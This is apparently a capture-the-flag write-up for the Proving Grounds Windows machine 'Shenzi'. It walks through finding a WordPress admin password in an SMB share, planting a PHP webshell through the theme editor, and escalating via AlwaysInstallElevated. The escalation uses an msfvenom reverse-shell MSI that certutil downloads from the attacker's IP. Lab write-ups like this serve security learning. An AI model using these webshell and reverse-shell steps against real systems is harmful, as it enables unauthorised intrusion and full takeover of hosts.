Shenzi

Source: Proving Grounds OS: Windows Community Rating: Hard

Enumeration & Reconnaissance

Started with the usual autorecon and was literally bombarded with open ports: FTP (21), HTTP (80), RPC (135), SMB (139), HTTP (443), SMB (445), MySQL (3306), 5040, 7680, 49664 -> 49669

Service Analysis

FTP was configured to not allow anonymous access, so nothing could be done there for now.
I then started with HTTP (80). It displayed XAMPP’s default page.

When I tried to access phpMyAdmin, I received the message:

"New XAMPP security concept: Access to the requested directory is only available from the local network."

I searched online for a quick bypass in case there was an easy workaround, but nothing was found, so I moved on. HTTP (443) was just a replica of HTTP (80), and the fuzzers didn’t expose anything of value either.
I started checking SMB. I just checked the files from autorecon, enum4linux showed nothing, but then smbclient revealed a share named Shenzi.

I connected to the share using: smbclient \192.168.213.55\Shenzi

Inside, I found a passwords.txt file:

### XAMPP Default Passwords ###

1) MySQL (phpMyAdmin):

   User: root
   Password:
   (means no password!)

2) FileZilla FTP:

   [ You have to create a new user on the FileZilla Interface ] 

3) Mercury (not in the USB & lite version): 

   Postmaster: Postmaster (postmaster@localhost)
   Administrator: Admin (admin@localhost)

   User: newuser  
   Password: wampp 

4) WEBDAV: 

   User: xampp-dav-unsecure
   Password: ppmax2011
   Attention: WEBDAV is not active since XAMPP Version 1.7.4.
   For activation please comment out the httpd-dav.conf and
   following modules in the httpd.conf
   
   LoadModule dav_module modules/mod_dav.so
   LoadModule dav_fs_module modules/mod_dav_fs.so  
   
   Please do not forget to refresh the WEBDAV authentification (users and passwords).     

5) WordPress:

   User: admin
   Password: FeltHeadwallWight357

Most passwords were defaults, except for WordPress, which wasn’t the default. That should have hinted at something.
However, I couldn’t find any WordPress site. Even the fuzzers didn't expose any. I tried the credentials on FTP with no luck, and kept going in circles. I started looking for hints and that's where the name of the box/user came in handy, the WordPress site is deployed behind the username, http://192.168.213.55/shenzi/

That's what I hate about CTFs in general, the type of guessing enumeration.

Gaining Initial Access

Since I already had the admin credentials for WordPress, I didn’t run wpscan. I logged in and checked if I could inject a shell into the PHP files. I went to Appearance > Theme Editor, chose a PHP file (I tested with 404.php), and injected a basic webshell:

if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }

When that worked, I uploaded Ivan Sincek’s shell, which provided a reverse shell.

Privilege Escalation

Once inside, I ran the basic whoami /priv and then uploaded WinPeas. WinPeas exposed that:

AlwaysInstallElevated is set to 1 in HKLM
AlwaysInstallElevated is set to 1 in HKCU

This means any MSI package we install will run with elevated privileges. I then created an MSI shell using msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=8811 -f msi -o shell.msi

I then uploaded and executed it:

certutil -urlcache -split -f http://192.168.45.170:901/shell.msi
.\shell.msi

Lessons Learned

Always check for shares; in this case, the Shenzi share contained a passwords file that was key to moving forward.
Sometimes, manual guess-work (like identifying the WordPress site via the username) is necessary when automated tools or fuzzers yield nothing. (I hate it)
Injecting a shell via the theme editor in WordPress is an easy way to gain initial access.
The AlwaysInstallElevated setting in both HKLM and HKCU is a reliable privilege escalation vector on Windows.

PreviousHepet NextNickel

Last updated 1 month ago